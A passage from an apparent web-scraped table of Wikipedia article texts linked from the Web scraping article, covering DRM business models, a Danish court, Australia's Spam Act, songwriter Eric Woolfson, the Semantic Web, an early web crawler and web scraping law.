mathematical models are strictly applicable to the music industry. Several business models offer DRM alternatives. 167 Streaming services have created profitable business models by signing users to monthly subscriptions in return for access to the service's library. This model has worked for music (such as Spotify, Apple Music, etc.) and video (such as Netflix, Disney , Hulu, etc.). Accessing a pirated copy can be illegal and inconvenient. Businesses that charge acceptable fees for doing so tend to attract customers. A business model that dissuades illegal file sharing is to make legal content downloading easy and cheap. Pirate websites often host malware which attaches itself to the files served. 168 If content is provided on legitimate sites and is reasonably priced, consumers are more likely to purchase media legally. 167 Crowdfunding has been used as a publishing model for digital content. 85 Many artists give away individual tracks to create awareness for a subsequent album. 167 The Artistic Freedom Voucher (AFV) introduced by Dean Baker is a way for consumers to support "creative and artistic work". In this system, each consumer receives a refundable tax credit of $100 to give to any artist of creative work. To restrict fraud, the artists must register with the government. The voucher prohibits any artist that receives the benefits from copyrighting their material for a certain length of time. Consumers would be allowed to obtain music for a certain amount of time easily and the consumer would decide which artists receive the $100. The money can either be given to one artist or to many, and this distribution is up to the consumer. 169 |
20 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Maritime_and_Commercial_Court_(Denmark) | Maritime and Commercial Court (Danish: S og Handelsretten) is a specialized Danish court with jurisdiction over cases involving commercial law and maritime law. It was founded in 1861. 1 It has a civil division, focusing on business cases, and a bankruptcy division. 2 |
21 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Spam_Act_2003 | The Spam Act 2003 (Cth) is an Act passed by the Australian Parliament in 2003 to regulate commercial e-mail and other types of commercial electronic messages. The Act restricts spam, especially e-mail spam and some types of phone spam, as well as e-mail address harvesting. However, there are broad exemptions. 1 The first portions of the Act came into effect on 12 December 2003, the day the act received Royal Assent, with the remaining sections of the Act coming into force on 10 April 2004. The Act was originally enforced by the Australian Communications Authority, which in 2005 merged into the Australian Communications and Media Authority (ACMA). The key points of the Act provide that: 2 In ACA v Clarity1 (2006), 3 Justice Robert Nicholson considered the respondent's key defence, being retrospective application of provisions under the Act relating to the acquisition and use of harvested address lists. He noted specifically that lists gathered or acquired prior to the Act coming into force are still subject to the legislation. He also struck out the respondent's defence that it had obtained consent to use the gathered addresses for the defined purpose, and also noted a lack of compliance with the provisions of the Act requiring the provision of a functional unsubscribe facility. |
22 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Special:Random | Eric Norman Woolfson (18 March 1945 2 December 2009) 1 was a Scottish songwriter, lyricist, vocalist, executive producer, pianist, and co-creator of the band the Alan Parsons Project, who sold over 50 million albums worldwide. Woolfson also pursued a career in musical theatre. Woolfson was born into a Jewish family in the Charing Cross area of Glasgow, where his family owned the Elders furniture store. He was raised in the Pollokshields area on the south side of the city and educated at the High School of Glasgow. Woolfson's interest in music was inspired by an uncle and he taught himself to play the piano. 2 After leaving school, he briefly flirted with becoming an accountant before moving to London to seek opportunities in the music industry. Arriving in London in 1963, he found work as a session pianist. The then current record producer for the Rolling Stones, Andrew Loog Oldham, signed him as a songwriter. During the following years, Woolfson wrote songs for artists such as Marianne Faithfull, Frank Ifield, Joe Dassin, the Tremeloes, Marie (French singer), Marmalade, Dave Berry, Peter Noone, and the Poets. In due course Woolfson signed other publishing deals as more of his songs were adopted by leading recording artists, throughout Europe and America. He also signed a deal with Southern Music, where he worked alongside composers and lyricists such as Andrew Lloyd Webber and Tim Rice. 3 In 1971, with the assistance of Eric Stewart, Kevin Godley, Lol Creme and Graham Gouldman (who later became 10cc), a single was produced under the name of Eric Elder ("San Tokay" b w "Sunflower") and issued on UK Philips 6006 081 and US Philips 40699. Woolfson then produced a single by Graham Gouldman ("Nowhere to Go" b w "Growing Older") which was issued in 1972 on UK CBS 7739. In the late 1960s and early 1970s, Woolfson was an independent record producer for several record companies, and worked with artists including Dave Berry, the Equals, the Tremeloes and, in 1973, Darren Burn. Despite his success, he found that earning a living as a songwriter was not easy and decided to try artist management. His move into management was instantly successful. His first two signings were Carl Douglas (whose record "Kung Fu Fighting" (1974) was one of the biggest selling hits of all time) and engineer record producer Alan Parsons. In 1974, Woolfson met record producer Alan Parsons at the Abbey Road Studios in London where both were working on different projects. Parsons asked Woolfson to become his manager and they worked together with a number of bands and artists including Pilot, Cockney Rebel, John Miles, Al Stewart, Ambrosia and the Hollies. Subsequently, Woolfson and Parsons formed the Alan Parsons Project, the name originally being intended as a working title for their collaborative project. From 1976 to 1987, Woolfson and Parsons collaborated on the conception and lyrics for all ten albums by the Alan Parsons Project, which have achieved worldwide album sales in excess of 50 million. On every Project album, Woolfson would sing a guide vocal track for each song, which the album's eventual lead vocalists would use as a reference. Some of these tracks can be heard on the new remastered editions of various Project albums released in 2007. Woolfson himself was the actual singer on many of the Project's biggest hits such as "Time", "Don't Answer Me", "Prime Time" and the band's signature tune "Eye in the Sky", which peaked at No. 3 on the Billboard Hot 100 on 16 30 October 1982. Freudiana was originally meant to be the 11th album by the Alan Parsons Project, but Woolfson was keen to explore the possibility of realising the project as a musical. While recording the album, Brian Brolly was introduced to Woolfson and promised to steer the album in this new direction. Brolly was previously a partner with Andrew Lloyd Webber, and together they created such musicals as Cats. With some help from Brolly, Woolfson was able to turn Freudiana into a stage musical. Before the Freudiana stage production opened in 1990 in Vienna, a double-length studio album was released. The musical had a successful run, and it was planned that the show would open in other cities. However, plans were put on hold when a lawsuit broke out between Brolly and Woolfson, each fighting for control of the project. The studio disc (the "white" album) was quite difficult to obtain for a while. There was also a double-length German-language cast disc (the "black" album) which is currently out of print. Woolfson explained his career switch during an interview in 2004: I eventually developed The Alan Parsons Project as a vehicle but then I realised that there was more to it than that and that Andrew Lloyd Webber was right and that the stage musical was a fulfilling media for a writer like myself. I got into stage musicals in the mid 1980s. 4 His first three musicals were Freudiana (1990), about Sigmund Freud; Gaudi (1993), 5 about Antonio Gaudi, and Gambler (1996). A fourth musical Edgar Allan POE, based on the life of the author, was given a world premiere concert production at Abbey Road studios, London in 2003. 6 An album was released in 2003 as Poe: More Tales of Mystery and Imagination (this contains some but not all of the songs from the stage version), and a musical album CD Edgar Allan Poe (containing the complete musical score of 17 songs) and a DVD of the POE Abbey Road concert were released in 2009. 7 Dancing with Shadows (inspired by the anti-war play Forest Fire by the Korean playwright Cham Bum-Suk and with a book by Ariel Dorfman) was premiered in July 2007 in Korea. 8 Woolfson married his wife Hazel in 1969 and they had two daughters and four grandchildren. 9 Politically, he was a centrist, supporting the Social Democratic Party (SDP) throughout the 1980s. 3 A friend of the SDP's second leader, David Owen, Woolfson refused to back the party's merger with the Liberal Party in 1988 and instead followed Owen into the 'continuing' SDP, of which he was a trustee (alongside David Sainsbury and Sir Leslie Murphy) until it was dissolved in 1990. 3 10 Woolfson died from kidney cancer in London on 2 December 2009. He was survived by his wife, daughters Sally Seddon and Lorna Covington and four grandchildren. 11 He is buried in Cathcart Cemetery near Glasgow. |
23 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Semantic_web | The Semantic Web, sometimes known as Web 3.0 (not to be confused with Web3), is an extension of the World Wide Web through standards 1 set by the World Wide Web Consortium (W3C). The goal of the Semantic Web is to make Internet data machine-readable. To enable the encoding of semantics with the data, technologies such as Resource Description Framework (RDF) 2 and Web Ontology Language (OWL) 3 are used. These technologies are used to formally represent metadata. For example, ontology can describe concepts, relationships between entities, and categories of things. These embedded semantics offer significant advantages such as reasoning over data and operating with heterogeneous data sources. 4 These standards promote common data formats and exchange protocols on the Web, fundamentally the RDF. According to the W3C, "The Semantic Web provides a common framework that allows data to be shared and reused across application, enterprise, and community boundaries. 5 The Semantic Web is therefore regarded as an integrator across different content and information applications and systems. The term was coined by Tim Berners-Lee for a web of data (or data web) 6 that can be processed by machines 7 —that is, one in which much of the meaning is machine-readable. While its critics have questioned its feasibility, proponents argue that applications in library and information science, industry, biology and human sciences research have already proven the validity of the original concept. 8 Berners-Lee originally expressed his vision of the Semantic Web in 1999 as follows: I have a dream for the Web in which computers become capable of analyzing all the data on the Web the content, links, and transactions between people and computers. A "Semantic Web", which makes this possible, has yet to emerge, but when it does, the day-to-day mechanisms of trade, bureaucracy and our daily lives will be handled by machines talking to machines. The "intelligent agents" people have touted for ages will finally materialize. 9 The 2001 Scientific American article by Berners-Lee, Hendler, and Lassila described an expected evolution of the existing Web to a Semantic Web. 10 In 2006, Berners-Lee and colleagues stated that: "This simple idea…remains largely unrealized". 11 In 2013, more than four million Web domains (out of roughly 250 million total) contained Semantic Web markup. 12 In the following example, the text "Paul Schuster was born in Dresden" on a website will be annotated, connecting a person with their place of birth. The following HTML fragment shows how a small graph is being described, in RDFa-syntax using a schema.org vocabulary and a Wikidata ID: The example defines the following five triples (shown in Turtle syntax). Each triple represents one edge in the resulting graph: the first element of the triple (the subject) is the name of the node where the edge starts, the second element (the predicate) the type of the edge, and the last and third element (the object) either the name of the node where the edge ends or a literal value (e.g. a text, a number, etc.). The triples result in the graph shown in the given figure. One of the advantages of using Uniform Resource Identifiers (URIs) is that they can be dereferenced using the HTTP protocol. According to the so-called Linked Open Data principles, such a dereferenced URI should result in a document that offers further data about the given URI. In this example, all URIs, both for edges and nodes (e.g. http: schema.org Person, http: schema.org birthPlace, http: www.wikidata.org entity Q1731) can be dereferenced and will result in further RDF graphs, describing the URI, e.g. that Dresden is a city in Germany, or that a person, in the sense of that URI, can be fictional. The second graph shows the previous example, but now enriched with a few of the triples from the documents that result from dereferencing https: schema.org Person (green edge) and https: www.wikidata.org entity Q1731 (blue edges). Additionally to the edges given in the involved documents explicitly, edges can be automatically inferred: the triple from the original RDFa fragment and the triple from the document at https: schema.org Person (green edge in the figure) allow to infer the following triple, given OWL semantics (red dashed line in the second Figure): The concept of the semantic network model was formed in the early 1960s by researchers such as the cognitive scientist Allan M. Collins, linguist Ross Quillian and psychologist Elizabeth F. Loftus as a form to represent semantically structured knowledge. When applied in the context of the modern internet, it extends the network of hyperlinked human-readable web pages by inserting machine-readable metadata about pages and how they are related to each other. This enables automated agents to access the Web more intelligently and perform more tasks on behalf of users. The term "Semantic Web" was coined by Tim Berners-Lee, 7 the inventor of the World Wide Web and director of the World Wide Web Consortium ("W3C"), which oversees the development of proposed Semantic Web standards. He defines the Semantic Web as "a web of data that can be processed directly and indirectly by machines". Many of the technologies proposed by the W3C already existed before they were positioned under the W3C umbrella. These are used in various contexts, particularly those dealing with information that encompasses a limited and defined domain, and where sharing data is a common necessity, such as scientific research or data exchange among businesses. In addition, other technologies with similar goals have emerged, such as microformats. Many files on a typical computer can also be loosely divided into human-readable documents and machine-readable data. Documents like mail messages, reports, and brochures are read by humans. Data, such as calendars, address books, playlists, and spreadsheets are presented using an application program that lets them be viewed, searched, and combined. Currently, the World Wide Web is based mainly on documents written in Hypertext Markup Language (HTML), a markup convention that is used for coding a body of text interspersed with multimedia objects such as images and interactive forms. Metadata tags provide a method by which computers can categorize the content of web pages. In the examples below, the field names "keywords", "description" and "author" are assigned values such as "computing", and "cheap widgets for sale" and "John Doe". Because of this metadata tagging and categorization, other computer systems that want to access and share this data can easily identify the relevant values. With HTML and a tool to render it (perhaps web browser software, perhaps another user agent), one can create and present a page that lists items for sale. The HTML of this catalog page can make simple, document-level assertions such as "this document's title is 'Widget Superstore' , but there is no capability within the HTML itself to assert unambiguously that, for example, item number X586172 is an Acme Gizmo with a retail price of 199, or that it is a consumer product. Rather, HTML can only say that the span of text "X586172" is something that should be positioned near "Acme Gizmo" and 199", etc. There is no way to say "this is a catalog" or even to establish that "Acme Gizmo" is a kind of title or that 199" is a price. There is also no way to express that these pieces of information are bound together in describing a discrete item, distinct from other items perhaps listed on the page. Semantic HTML refers to the traditional HTML practice of markup following intention, rather than specifying layout details directly. For example, the use of em denoting "emphasis" rather than i , which specifies italics. Layout details are left up to the browser, in combination with Cascading Style Sheets. But this practice falls short of specifying the semantics of objects such as items for sale or prices. Microformats extend HTML syntax to create machine-readable semantic markup about objects including people, organizations, events and products. 13 Similar initiatives include RDFa, Microdata and Schema.org. The Semantic Web takes the solution further. It involves publishing in languages specifically designed for data: Resource Description Framework (RDF), Web Ontology Language (OWL), and Extensible Markup Language (XML). HTML describes documents and the links between them. RDF, OWL, and XML, by contrast, can describe arbitrary things such as people, meetings, or airplane parts. These technologies are combined in order to provide descriptions that supplement or replace the content of Web documents. Thus, content may manifest itself as descriptive data stored in Web-accessible databases, 14 or as markup within documents (particularly, in Extensible HTML (XHTML) interspersed with XML, or, more often, purely in XML, with layout or rendering cues stored separately). The machine-readable descriptions enable content managers to add meaning to the content, i.e., to describe the structure of the knowledge we have about that content. In this way, a machine can process knowledge itself, instead of text, using processes similar to human deductive reasoning and inference, thereby obtaining more meaningful results and helping computers to perform automated information gathering and research. An example of a tag that would be used in a non-semantic web page: Encoding similar information in a semantic web page might look like this: Tim Berners-Lee calls the resulting network of Linked Data the Giant Global Graph, in contrast to the HTML-based World Wide Web. Berners-Lee posits that if the past was document sharing, the future is data sharing. His answer to the question of "how" provides three points of instruction. One, a URL should point to the data. Two, anyone accessing the URL should get data back. Three, relationships in the data should point to additional URLs with data. Tags, including hierarchical categories and tags that are collaboratively added and maintained (e.g. with folksonomies) can be considered part of, of potential use to or a step towards the semantic Web vision. 15 16 17 Unique identifiers, including hierarchical categories and collaboratively added ones, analysis tools (e.g. scite.ai algorithms) 18 and metadata, including tags, can be used to create forms of semantic webs webs that are to a certain degree semantic. In particular, such has been used for structuring scientific research i.a. by research topics and scientific fields by the projects OpenAlex, 19 20 21 Wikidata and Scholia which are under development and provide APIs, Web-pages, feeds and graphs for various semantic queries. Tim Berners-Lee has described the Semantic Web as a component of Web 3.0. 22 People keep asking what Web 3.0 is. I think maybe when you've got an overlay of scalable vector graphics everything rippling and folding and looking misty on Web 2.0 and access to a semantic Web integrated across a huge space of data, you'll have access to an unbelievable data resource … "Semantic Web" is sometimes used as a synonym for "Web 3.0", 23 though the definition of each term varies. Some of the challenges for the Semantic Web include vastness, vagueness, uncertainty, inconsistency, and deceit. Automated reasoning systems will have to deal with all of these issues in order to deliver on the promise of the Semantic Web. This list of challenges is illustrative rather than exhaustive, and it focuses on the challenges to the "unifying logic" and "proof" layers of the Semantic Web. The World Wide Web Consortium (W3C) Incubator Group for Uncertainty Reasoning for the World Wide Web 24 (URW3 XG) final report lumps these problems together under the single heading of "uncertainty". 25 Many of the techniques mentioned here will require extensions to the Web Ontology Language (OWL) for example to annotate conditional probabilities. This is an area of active research. 26 Standardization for Semantic Web in the context of Web 3.0 is under the care of W3C. 27 The term "Semantic Web" is often used more specifically to refer to the formats and technologies that enable it. 5 The collection, structuring and recovery of linked data are enabled by technologies that provide a formal description of concepts, terms, and relationships within a given knowledge domain. These technologies are specified as W3C standards and include: The Semantic Web Stack illustrates the architecture of the Semantic Web. The functions and relationships of the components can be summarized as follows: 28 Well-established standards: Not yet fully realized: The intent is to enhance the usability and usefulness of the Web and its interconnected resources by creating semantic web services, such as: Such services could be useful to public search engines, or could be used for knowledge management within an organization. Business applications include: In a corporation, there is a closed group of users and the management is able to enforce company guidelines like the adoption of specific ontologies and use of semantic annotation. Compared to the public Semantic Web there are lesser requirements on scalability and the information circulating within a company can be more trusted in general; privacy is less of an issue outside of handling of customer data. Critics question the basic feasibility of a complete or even partial fulfillment of the Semantic Web, pointing out both difficulties in setting it up and a lack of general-purpose usefulness that prevents the required effort from being invested. In a 2003 paper, Marshall and Shipman point out the cognitive overhead inherent in formalizing knowledge, compared to the authoring of traditional web hypertext: 43 While learning the basics of HTML is relatively straightforward, learning a knowledge representation language or tool requires the author to learn about the representation's methods of abstraction and their effect on reasoning. For example, understanding the class-instance relationship, or the superclass-subclass relationship, is more than understanding that one concept is a "type of" another concept. ... These abstractions are taught to computer scientists generally and knowledge engineers specifically but do not match the similar natural language meaning of being a "type of" something. Effective use of such a formal representation requires the author to become a skilled knowledge engineer in addition to any other skills required by the domain. ... Once one has learned a formal representation language, it is still often much more effort to express ideas in that representation than in a less formal representation ... . Indeed, this is a form of programming based on the declaration of semantic data and requires an understanding of how reasoning algorithms will interpret the authored structures. According to Marshall and Shipman, the tacit and changing nature of much knowledge adds to the knowledge engineering problem, and limits the Semantic Web's applicability to specific domains. A further issue that they point out are domain- or organization-specific ways to express knowledge, which must be solved through community agreement rather than only technical means. 43 As it turns out, specialized communities and organizations for intra-company projects have tended to adopt semantic web technologies greater than peripheral and less-specialized communities. 44 The practical constraints toward adoption have appeared less challenging where domain and scope is more limited than that of the general public and the World-Wide Web. 44 Finally, Marshall and Shipman see pragmatic problems in the idea of (Knowledge Navigator-style) intelligent agents working in the largely manually curated Semantic Web: 43 In situations in which user needs are known and distributed information resources are well described, this approach can be highly effective; in situations that are not foreseen and that bring together an unanticipated array of information resources, the Google approach is more robust. Furthermore, the Semantic Web relies on inference chains that are more brittle; a missing element of the chain results in a failure to perform the desired action, while the human can supply missing pieces in a more Google-like approach. ... cost-benefit tradeoffs can work in favor of specially-created Semantic Web metadata directed at weaving together sensible well-structured domain-specific information resources; close attention to user customer needs will drive these federations if they are to be successful. Cory Doctorow's critique ("metacrap") 45 is from the perspective of human behavior and personal preferences. For example, people may include spurious metadata into Web pages in an attempt to mislead Semantic Web engines that naively assume the metadata's veracity. This phenomenon was well known with metatags that fooled the Altavista ranking algorithm into elevating the ranking of certain Web pages: the Google indexing engine specifically looks for such attempts at manipulation. Peter G rdenfors and Timo Honkela point out that logic-based semantic web technologies cover only a fraction of the relevant phenomena related to semantics. 46 47 Enthusiasm about the semantic web could be tempered by concerns regarding censorship and privacy. For instance, text-analyzing techniques can now be easily bypassed by using other words, metaphors for instance, or by using images in place of words. An advanced implementation of the semantic web would make it much easier for governments to control the viewing and creation of online information, as this information would be much easier for an automated content-blocking machine to understand. In addition, the issue has also been raised that, with the use of FOAF files and geolocation meta-data, there would be very little anonymity associated with the authorship of articles on things such as a personal blog. Some of these concerns were addressed in the "Policy Aware Web" project 48 and is an active research and development topic. Another criticism of the semantic web is that it would be much more time-consuming to create and publish content because there would need to be two formats for one piece of data: one for human viewing and one for machines. However, many web applications in development are addressing this issue by creating a machine-readable format upon the publishing of data or the request of a machine for such data. The development of microformats has been one reaction to this kind of criticism. Another argument in defense of the feasibility of semantic web is the likely falling price of human intelligence tasks in digital labor markets, such as Amazon's Mechanical Turk. citation needed Specifications such as eRDF and RDFa allow arbitrary RDF data to be embedded in HTML pages. The GRDDL (Gleaning Resource Descriptions from Dialects of Language) mechanism allows existing material (including microformats) to be automatically interpreted as RDF, so publishers only need to use a single format, such as HTML. The first research group explicitly focusing on the Corporate Semantic Web was the ACACIA team at INRIA-Sophia-Antipolis, founded in 2002. Results of their work include the RDF(S) based Corese 49 search engine, and the application of semantic web technology in the realm of distributed artificial intelligence for knowledge management (e.g. ontologies and multi-agent systems for corporate semantic Web) 50 and E-learning. 51 Since 2008, the Corporate Semantic Web research group, located at the Free University of Berlin, focuses on building blocks: Corporate Semantic Search, Corporate Semantic Collaboration, and Corporate Ontology Engineering. 52 Ontology engineering research includes the question of how to involve non-expert users in creating ontologies and semantically annotated content 53 and for extracting explicit knowledge from the interaction of users within enterprises. Tim O'Reilly, who coined the term Web 2.0, proposed a long-term vision of the Semantic Web as a web of data, where sophisticated applications are navigating and manipulating it. 54 The data web transforms the World Wide Web from a distributed file system into a distributed database. 55 |
24 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/World_Wide_Web_Wanderer | The World Wide Web Wanderer, also simply called The Wanderer, was a Perl-based web crawler that was first deployed in June 1993 to measure the size of the World Wide Web. The Wanderer was developed at the Massachusetts Institute of Technology by Matthew Gray, who also created back in 1993 one of the 100 first web servers in history, www.mit.edu. 1 The crawler was used to generate an index called the Wandex later in 1993. The Wanderer charted the growth of the web until late 1995. The Wanderer was probably the first web robot, and, with its index, clearly had the potential to become a general-purpose WWW search engine. The author, Matthew Gray, does not make this claim. 2 Elsewhere, it is stated that the purpose of the Wanderer was not to be a web search engine. 3 |
25 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&printable=yes | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being 